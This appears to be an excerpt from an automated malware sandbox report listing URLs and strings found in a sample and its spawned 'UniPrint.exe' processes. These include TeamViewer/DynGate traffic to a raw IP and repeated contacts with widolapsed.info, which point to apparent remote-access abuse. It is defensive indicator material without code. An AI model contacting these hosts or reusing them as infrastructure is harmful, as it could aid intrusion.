","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"Legac
Source: svchost.exe, 00000010.00000003.796660082.00000217C6F8B000.00000004.00000001.sdmp String found in binary or memory: is absolutely free to play, you have the ability to unlock optional bonuses via in-app purchases from within the game. You may disable in-app purchases in your device settings.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"Legac
Source: UniPrint.exe, 00000005.00000003.716845833.00000000057DB000.00000004.00000001.sdmp String found in binary or memory: http://188.172.235.146/
Source: UniPrint.exe, 00000005.00000003.716845833.00000000057DB000.00000004.00000001.sdmp String found in binary or memory: http://188.172.235.146/EM
Source: UniPrint.exe, 00000005.00000002.1075966656.0000000005820000.00000004.00000001.sdmp String found in binary or memory: http://188.172.235.146/din.aspx?s=00000000&m=fast&client=DynGate&rnd=975066281&p=10000001
Source: UniPrint.exe, 00000005.00000003.715254848.0000000005801000.00000004.00000001.sdmp String found in binary or memory: http://188.172.235.146/din.aspx?s=00000000&m=fast&client=DynGate&rnd=975066281&p=100000012
Source: UniPrint.exe, 00000005.00000002.1075966656.0000000005820000.00000004.00000001.sdmp String found in binary or memory: http://188.172.235.146/din.aspx?s=00000000&m=fast&client=DynGate&rnd=975066281&p=10000001K
Source: UniPrint.exe, 00000005.00000002.1075067789.0000000003B1C000.00000004.00000001.sdmp String found in binary or memory: http://188.172.235.146/din.aspx?s=12251267&m=fast&client=DynGate&p=1000
Source: UniPrint.exe, 00000005.00000002.1075966656.0000000005820000.00000004.00000001.sdmp String found in binary or memory: http://188.172.235.146/din.aspx?s=12251267&m=fast&client=DynGate&p=10000002
Source: UniPrint.exe, 00000005.00000003.1014947497.00000000057B2000.00000004.00000001.sdmp String found in binary or memory: http://188.172.235.146/din.aspx?s=12251267&m=fast&client=DynGate&p=10000002.
Source: UniPrint.exe, 00000005.00000003.715254848.0000000005801000.00000004.00000001.sdmp String found in binary or memory: http://188.172.235.146/din.aspx?s=12251267&m=fast&client=DynGate&p=100000023321935-2125563209-405306
Source: UniPrint.exe, 00000005.00000003.714775003.00000000057B2000.00000004.00000001.sdmp String found in binary or memory: http://188.172.235.146/din.aspx?s=12251267&m=fast&client=DynGate&p=10000002Z
Source: UniPrint.exe, 00000005.00000003.1014994738.00000000057DB000.00000004.00000001.sdmp String found in binary or memory: http://188.172.235.146/dout.aspx?s=12251267&p=10000001&client=DynGate
Source: UniPrint.exe, 00000005.00000003.1014994738.00000000057DB000.00000004.00000001.sdmp String found in binary or memory: http://188.172.235.146/dout.aspx?s=12251267&p=10000001&client=DynGatepzm
Source: UniPrint.exe, 00000005.00000002.1075067789.0000000003B1C000.00000004.00000001.sdmp String found in binary or memory: http://188.172.235.146/dout.aspx?s=12251267&p=10000002&client
Source: UniPrint.exe, 00000005.00000003.1015064081.0000000000B75000.00000004.00000001.sdmp String found in binary or memory: http://188.172.235.146/dout.aspx?s=12251267&p=10000002&client=DynGate
Source: UniPrint.exe, 00000005.00000002.1072952284.0000000000AE8000.00000004.00000020.sdmp String found in binary or memory: http://188.172.235.146/dout.aspx?s=12251267&p=10000002&client=DynGate:%
Source: UniPrint.exe, 00000005.00000003.1015064081.0000000000B75000.00000004.00000001.sdmp String found in binary or memory: http://188.172.235.146/dout.aspx?s=12251267&p=10000002&client=DynGateZ
Source: UniPrint.exe, 00000005.00000003.1014994738.00000000057DB000.00000004.00000001.sdmp String found in binary or memory: http://188.172.235.146/dout.aspx?s=12251267&p=10000002&client=DynGatellow
Source: wogZe27GBB.exe String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: wogZe27GBB.exe String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: svchost.exe, 00000010.00000002.817773606.00000217C6F00000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: wogZe27GBB.exe String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: svchost.exe, 00000010.00000002.817452731.00000217C68E9000.00000004.00000001.sdmp String found in binary or memory: http://crl.ver)
Source: UniPrint.exe, 0000000A.00000002.757533910.0000000000B88000.00000004.00000020.sdmp String found in binary or memory: http://crl.verisign.co
Source: UniPrint.exe, 0000000A.00000002.757533910.0000000000B88000.00000004.00000020.sdmp String found in binary or memory: http://crl.verisign.corl0
Source: wogZe27GBB.exe String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: wogZe27GBB.exe String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: wogZe27GBB.exe String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: wogZe27GBB.exe String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: wogZe27GBB.exe String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.dr String found in binary or memory: http://go.teamviewer.comn0
Source: UniPrint.exe, 00000005.00000003.710224733.00000000057D9000.00000004.00000001.sdmp String found in binary or memory: http://master13.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=279943160&p=10000001
Source: UniPrint.exe, 00000005.00000002.1075966656.0000000005820000.00000004.00000001.sdmp String found in binary or memory: http://master13.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=279943160&p=10000001;
Source: UniPrint.exe, 00000005.00000003.709879277.00000000057F0000.00000004.00000001.sdmp String found in binary or memory: http://master13.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=279943160&p=10000001ndows.Phot
Source: UniPrint.exe, 00000005.00000002.1075966656.0000000005820000.00000004.00000001.sdmp String found in binary or memory: http://master13.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=279943160&p=10000001s
Source: UniPrint.exe, 00000005.00000002.1073157453.0000000000B65000.00000004.00000020.sdmp String found in binary or memory: http://master13.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=991669640&p=10000001
Source: UniPrint.exe, 00000005.00000003.1015064081.0000000000B75000.00000004.00000001.sdmp String found in binary or memory: http://master13.teamviewer.com/din.aspx?s=42047145&client=DynGate&p=10000002
Source: UniPrint.exe, 00000005.00000003.1015064081.0000000000B75000.00000004.00000001.sdmp String found in binary or memory: http://master13.teamviewer.com/din.aspx?s=42047145&client=DynGate&p=10000002u
Source: UniPrint.exe, 00000005.00000003.1015064081.0000000000B75000.00000004.00000001.sdmp String found in binary or memory: http://master13.teamviewer.com/din.aspx?s=42047152&client=DynGate&p=10000002
Source: UniPrint.exe, 00000005.00000003.1015064081.0000000000B75000.00000004.00000001.sdmp String found in binary or memory: http://master13.teamviewer.com/din.aspx?s=42047152&client=DynGate&p=100000026
Source: UniPrint.exe, 00000005.00000003.1015064081.0000000000B75000.00000004.00000001.sdmp String found in binary or memory: http://master13.teamviewer.com/din.aspx?s=42047159&client=DynGate&p=10000002
Source: UniPrint.exe, 00000005.00000003.710194245.00000000057D4000.00000004.00000001.sdmp String found in binary or memory: http://master13.teamviewer.com/din.aspx?s=42047159&client=DynGate&p=100000023v
Source: UniPrint.exe, 00000005.00000003.1015064081.0000000000B75000.00000004.00000001.sdmp, UniPrint.exe, 00000005.00000003.713534320.0000000005721000.00000004.00000001.sdmp String found in binary or memory: http://master13.teamviewer.com/din.aspx?s=42047224&client=DynGate&p=10000002
Source: UniPrint.exe, 00000005.00000003.715254848.0000000005801000.00000004.00000001.sdmp String found in binary or memory: http://master13.teamviewer.com/din.aspx?s=42047224&client=DynGate&p=10000002321935-2125563209-405306
Source: UniPrint.exe, 00000005.00000002.1073179417.0000000000B68000.00000004.00000020.sdmp String found in binary or memory: http://master13.teamviewer.com/dout.aspx?s=42047145&p=10000001&client=DynGate&data=FyQSbQCjHqkys5Mko
Source: UniPrint.exe, 00000005.00000002.1073127658.0000000000B5D000.00000004.00000020.sdmp String found in binary or memory: http://master13.teamviewer.com/dout.aspx?s=42047152&p=10000001&client=DynGate&data=FyQS8QAjHqmyuig6s
Source: UniPrint.exe, 00000005.00000003.1015064081.0000000000B75000.00000004.00000001.sdmp String found in binary or memory: http://master13.teamviewer.com/dout.aspx?s=42047159&p=10000001&client=DynGate&data=FyQS9ACjHqmyuim0s
Source: UniPrint.exe, 00000005.00000003.1014994738.00000000057DB000.00000004.00000001.sdmp, UniPrint.exe, 00000005.00000003.713565888.000000000576A000.00000004.00000001.sdmp, UniPrint.exe, 00000005.00000003.713161991.00000000057D0000.00000004.00000001.sdmp String found in binary or memory: http://master13.teamviewer.com/dout.aspx?s=42047224&p=10000001&client=DynGate&data=FyQS6wChtjSytzoeq
Source: UniPrint.exe, 00000005.00000002.1075067789.0000000003B1C000.00000004.00000001.sdmp String found in binary or memory: http://mastr13.teamv
Source: UniPrint.exe, 00000005.00000002.1075067789.0000000003B1C000.00000004.00000001.sdmp String found in binary or memory: http://mastr13.teamviewer.com/din.aspx?s=0000000&client=DynGate&rnd=2
Source: wogZe27GBB.exe String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: wogZe27GBB.exe String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: wogZe27GBB.exe String found in binary or memory: http://ocsp.digicert.com0C
Source: wogZe27GBB.exe String found in binary or memory: http://ocsp.digicert.com0O
Source: wogZe27GBB.exe String found in binary or memory: http://ocsp.sectigo.com0
Source: UniPrint.exe, UniPrint.exe, 00000005.00000000.698733412.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.756410027.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000002.759885262.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000000.758970133.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000002.778184105.0000000000733000.00000002.00020000.sdmp, nsrC1CA.tmp.0.dr String found in binary or memory: http://www.TeamViewer.com
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.dr String found in binary or memory: http://www.TeamViewer.com#http://www.TeamViewer.com/licensing
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.dr String found in binary or memory: http://www.TeamViewer.com/download
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.dr String found in binary or memory: http://www.TeamViewer.com/help
Source: wogZe27GBB.exe String found in binary or memory: http://www.digicert.com/CPS0
Source: svchost.exe, 00000010.00000003.796660082.00000217C6F8B000.00000004.00000001.sdmp String found in binary or memory: http://www.g5e.com/G5_End_User_License_Supplemental_Terms
Source: svchost.exe, 00000010.00000003.796660082.00000217C6F8B000.00000004.00000001.sdmp String found in binary or memory: http://www.g5e.com/termsofservice
Source: nsrC1CA.tmp.0.dr String found in binary or memory: http://www.teamviewer.com
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000000.684861880.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000000.698733412.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.756410027.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000002.759885262.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000000.758970133.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000002.778184105.0000000000733000.00000002.00020000.sdmp, nsrC1CA.tmp.0.dr String found in binary or memory: http://www.teamviewer.com/CConnectionHistoryManager::createMessageString():
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.dr String found in binary or memory: http://www.teamviewer.com/company/index.aspx
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.dr String found in binary or memory: http://www.teamviewer.com/download/beta.aspx
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.dr String found in binary or memory: http://www.teamviewer.com/download/version_4x/TeamViewerQS.exe
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.dr String found in binary or memory: http://www.teamviewer.com/download/version_5x/TeamViewerQS.exe
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000002.1074572782.0000000002A4C000.00000004.00000001.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.dr String found in binary or memory: http://www.teamviewer.com/favicon.ico
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.dr String found in binary or memory: http://www.teamviewer.com/help/connectivity.aspx:
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.dr String found in binary or memory: http://www.teamviewer.com/help/support.aspxK
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.dr String found in binary or memory: http://www.teamviewer.com/ja/company/shutdown.aspx
Source: UniPrint.exe, 00000005.00000002.1074572782.0000000002A4C000.00000004.00000001.sdmp String found in binary or memory: http://www.teamviewer.com/ja/company/shutdown.aspx?version=
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.dr String found in binary or memory: http://www.teamviewer.com/ja/integrated/trial.aspx?ID=%1%&IC=%2%
Source: UniPrint.exe, 00000005.00000002.1074572782.0000000002A4C000.00000004.00000001.sdmp String found in binary or memory: http://www.teamviewer.com/ja/licensing/commercialuse.aspx
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.dr String found in binary or memory: http://www.teamviewer.com/licensing/commercialuse.aspx
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.dr String found in binary or memory: http://www.teamviewer.com/licensing/register.aspx&http://www.teamviewer.com/r$$id$$.aspx7http://www.
Source: svchost.exe, 00000010.00000003.803398605.00000217C6F5E000.00000004.00000001.sdmp, svchost.exe, 00000010.00000003.804244092.00000217C6FC5000.00000004.00000001.sdmp String found in binary or memory: https://corp.roblox.com/contact/
Source: svchost.exe, 00000010.00000003.803398605.00000217C6F5E000.00000004.00000001.sdmp, svchost.exe, 00000010.00000003.804244092.00000217C6FC5000.00000004.00000001.sdmp String found in binary or memory: https://corp.roblox.com/parents/
Source: svchost.exe, 00000010.00000003.794457434.00000217C6F81000.00000004.00000001.sdmp String found in binary or memory: https://displaycatalog.m(
Source: svchost.exe, 00000010.00000003.803398605.00000217C6F5E000.00000004.00000001.sdmp, svchost.exe, 00000010.00000003.804244092.00000217C6FC5000.00000004.00000001.sdmp String found in binary or memory: https://en.help.roblox.com/hc/en-us
Source: wogZe27GBB.exe String found in binary or memory: https://sectigo.com/CPS0
Source: svchost.exe, 00000010.00000003.796660082.00000217C6F8B000.00000004.00000001.sdmp String found in binary or memory: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure
Source: UniPrint.exe, 00000005.00000003.1014994738.00000000057DB000.00000004.00000001.sdmp String found in binary or memory: https://widolapsed.info/
Source: UniPrint.exe, 00000005.00000002.1075859898.00000000057DB000.00000004.00000001.sdmp String found in binary or memory: https://widolapsed.info/8C631A8/ELBASE.dll.mui01
Source: UniPrint.exe, 00000005.00000003.1014994738.00000000057DB000.00000004.00000001.sdmp String found in binary or memory: https://widolapsed.info/B8C631A8/
Source: UniPrint.exe, 00000005.00000002.1075859898.00000000057DB000.00000004.00000001.sdmp String found in binary or memory: https://widolapsed.info/B8C631A8/(c~
Source: UniPrint.exe, 00000005.00000003.855571733.00000000057D3000.00000004.00000001.sdmp String found in binary or memory: https://widolapsed.info/B8C631A8/.i
Source: UniPrint.exe, 00000005.00000003.1014994738.00000000057DB000.00000004.00000001.sdmp String found in binary or memory: https://widolapsed.info/B8C631A8/8
Source: UniPrint.exe, 00000005.00000003.1015064081.0000000000B75000.00000004.00000001.sdmp String found in binary or memory: https://widolapsed.info/B8C631A8/B
Source: UniPrint.exe, 00000005.00000003.1014994738.00000000057DB000.00000004.00000001.sdmp String found in binary or memory: https://widolapsed.info/B8C631A8/ELBASE.dll.mui01
